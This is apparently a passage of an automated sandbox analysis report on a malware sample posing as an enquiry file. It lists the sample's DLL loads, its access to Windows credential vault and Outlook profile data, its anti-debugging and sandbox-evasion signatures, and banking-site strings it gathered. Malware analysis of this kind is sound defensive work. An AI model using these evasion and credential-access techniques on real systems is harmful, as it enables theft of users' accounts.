            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 3T-ENQ-O-2024-10856.exeStatic file information: File size 1209344 > 1048576
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CgEnKbPFVbMNeA.exe, 00000004.00000002.2598819494.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2598388539.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365624481.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363613646.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1717999457.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715868537.0000000003700000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1814673668.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1812307796.000000000351B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003870000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365624481.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363613646.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1717999457.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715868537.0000000003700000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000003.1814673668.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1812307796.000000000351B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003870000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1812499101.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1779767157.0000000003414000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000003.1750564204.00000000009FB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1812499101.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1779767157.0000000003414000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000003.1750564204.00000000009FB000.00000004.00000001.00020000.00000000.sdmp
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CC20F6 LoadLibraryA,GetProcAddress,0_2_00CC20F6
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C87795 push ecx; ret 0_2_00C877A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A883 push FFFFFFC7h; retf 2_2_0040AA9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AEA4 push cs; retf 2_2_0040AEAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004036B0 push eax; ret 2_2_004036B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004087F2 push ecx; iretd 2_2_004087FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0225F pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B027FA pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0283D push eax; iretd 2_2_03B02858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0387225F pushad ; ret 5_2_038727F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038727FA pushad ; ret 5_2_038727F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038A09AD push ecx; mov dword ptr [esp], ecx5_2_038A09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0387283D push eax; iretd 5_2_03872858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03871368 push eax; iretd 5_2_03871369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0302017D push ebp; ret 5_2_030201F3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03020AAF push es; iretd 5_2_03020AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03020ACF push ds; iretd 5_2_03020AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300513F push ecx; iretd 5_2_03005148
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030071D0 push FFFFFFC7h; retf 5_2_030073E7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030110B0 push es; retf 6D50h5_2_0301119D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030077F1 push cs; retf 5_2_030077F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300DDB9 push ss; rep ret 5_2_0300DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300DDC3 push ss; rep ret 5_2_0300DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03023C70 push edi; iretd 5_2_03023C7B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361638E push cx; retf 5_2_03616390
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361D23A pushad ; ret 5_2_0361D23C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_036150E3 push 86FB9775h; ret 5_2_036150EA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_036170C9 push es; retf 5_2_036170D5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361EFC8 push ebx; iretd 5_2_0361F03E
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03615D22 pushad ; iretd 5_2_03615D23
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03615D94 push es; iretd 5_2_03615DA6
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C7F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C7F78E
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CC7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CC7F0E
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C81E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C81E5A
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeAPI/Special instruction interceptor: Address: 3393224
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9841Jump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeEvaded block: after key decisiongraph_0-109835
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeEvaded block: after key decisiongraph_0-109052
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-109322
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7648Thread sleep count: 133 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7648Thread sleep time: -266000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7648Thread sleep count: 9841 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7648Thread sleep time: -19682000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe TID: 7760Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C7DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DD92
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CB2044
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CB219F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CB24A9
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00CA6B3F
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00CA6E4A
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CAF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CAF350
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CAFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CAFDD2
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CAFD47 FindFirstFileW,FindClose,0_2_00CAFD47
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0301C0D0 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C0D0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C7E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C7E47B
            Source: 1m0Sa73J8.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: 1m0Sa73J8.5.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: 1m0Sa73J8.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: 1m0Sa73J8.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: 1m0Sa73J8.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: 1m0Sa73J8.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: 1m0Sa73J8.5.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: 1m0Sa73J8.5.drBinary or memory string: global block list test formVMware20,11696503903
            Source: 1m0Sa73J8.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: 1m0Sa73J8.5.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: 1m0Sa73J8.5.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: 1m0Sa73J8.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: 1m0Sa73J8.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: 1m0Sa73J8.5.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: 1m0Sa73J8.5.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2599718239.0000000001160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 1m0Sa73J8.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: 1m0Sa73J8.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: 3T-ENQ-O-2024-10856.exe, 00000000.00000002.1366296810.0000000000DDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: 1m0Sa73J8.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: 1m0Sa73J8.5.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: 1m0Sa73J8.5.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: 1m0Sa73J8.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: 1m0Sa73J8.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: 1m0Sa73J8.5.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: 1m0Sa73J8.5.drBinary or memory string: discord.comVMware20,11696503903f
            Source: 1m0Sa73J8.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: firefox.exe, 0000000A.00000002.2163091931.00000191255AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeAPI call chain: ExitProcess graph end nodegraph_0-108854
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417703 LdrLoadDll,2_2_00417703
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB703C BlockInput,0_2_00CB703C
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C6374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_00C6374E
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C946D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00C946D0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CC20F6 LoadLibraryA,GetProcAddress,0_2_00CC20F6
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_03393490 mov eax, dword ptr fs:[00000030h]0_2_03393490
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_033934F0 mov eax, dword ptr fs:[00000030h]0_2_033934F0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_03391E70 mov eax, dword ptr fs:[00000030h]0_2_03391E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
